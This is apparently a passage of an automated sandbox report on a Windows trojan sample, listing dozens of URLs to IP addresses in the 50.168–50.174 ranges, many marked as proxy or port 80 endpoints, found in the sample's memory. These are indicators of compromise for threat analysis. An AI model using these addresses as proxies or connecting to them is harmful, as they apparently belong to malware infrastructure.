                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.210.226
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC0E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.210.226://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBC16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.210.232
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBBA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.210.232://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.210.234
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.210.234://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.210.235
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.210.235://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.210.235:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6C98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.210.236
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8483000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.210.236://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.210.236:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBEFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.210.238
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.210.238://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.210.238:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBA8A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.210.239
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBAEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.210.239://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBAEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.210.239:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.7.250
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.7.250://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.7.250:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8190000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.72.112
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C818C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.72.112://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C699A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.72.113
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.72.113://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.72.113:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.72.114
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.72.114://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.72.115://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB346000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.72.115x
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.72.116
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.72.116://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.72.116:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.72.117
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.72.117://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.72.117:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.72.118
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.72.118://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.72.119
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.72.119://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBFD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.72.122
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBF7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.72.122://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC15B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.72.122:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.89.184
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.89.184://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.89.184:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.169.118.211
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.169.118.211://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.169.118.211:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.169.135.10
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.169.135.10://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.169.135.10:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.169.23.170
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.169.23.170://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.169.37.50
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.169.37.50://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.169.37.50:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCBB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.170.152.189
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8F0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.170.152.189://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.170.152.189:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.170.90.24
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.170.90.24://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.170.90.25
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.170.90.25://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.170.90.26
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C806C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.170.90.26://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.170.90.27
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.170.90.27://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.170.90.27:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.170.90.28
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.170.90.28://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.170.90.28:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.170.90.29
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.170.90.29://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAC01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.170.90.30
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C64DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.170.90.30://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C64DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.170.90.30:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.170.90.31
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.170.90.31://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.170.90.31:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.170.90.34
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.170.90.34://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.170.90.34:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.171.68.130
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.171.68.130://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.171.68.130:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.172.218.164
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.172.218.164://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.172.218.164:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.172.227.202://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.172.227.202x
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.172.23.10
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.172.23.10://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.172.23.10:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.172.39.98
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.172.39.98://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.172.39.98:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.172.75.120
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.172.75.120://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.172.75.120:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.172.75.121
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.172.75.121://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.172.75.121:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.172.75.122
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C66BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.172.75.122://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C66BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.172.75.122:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBCB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.172.75.123
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.172.75.123://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA295000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBEEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.172.75.123:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.172.75.124
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.172.75.124://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.172.75.125
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.172.75.125://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.172.75.125:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7D82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.172.75.126
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.172.75.126://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7969000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.172.75.126:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.173.140.138
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.173.140.138://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.173.140.138:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.173.140.144
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.173.140.144://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.173.140.144:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.173.140.145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.173.140.145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.173.140.146
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.173.140.146://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.173.140.146:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.173.140.147
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.173.140.147://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.173.140.147:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.173.140.148
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.173.140.148://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.173.140.148:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.173.140.149
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.173.140.149://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.173.140.149:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.173.140.150
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.173.140.150://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.173.140.151
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.173.140.151://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.173.140.151:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.173.182.90
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.173.182.90://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.173.182.90:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C65A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.174.145.10
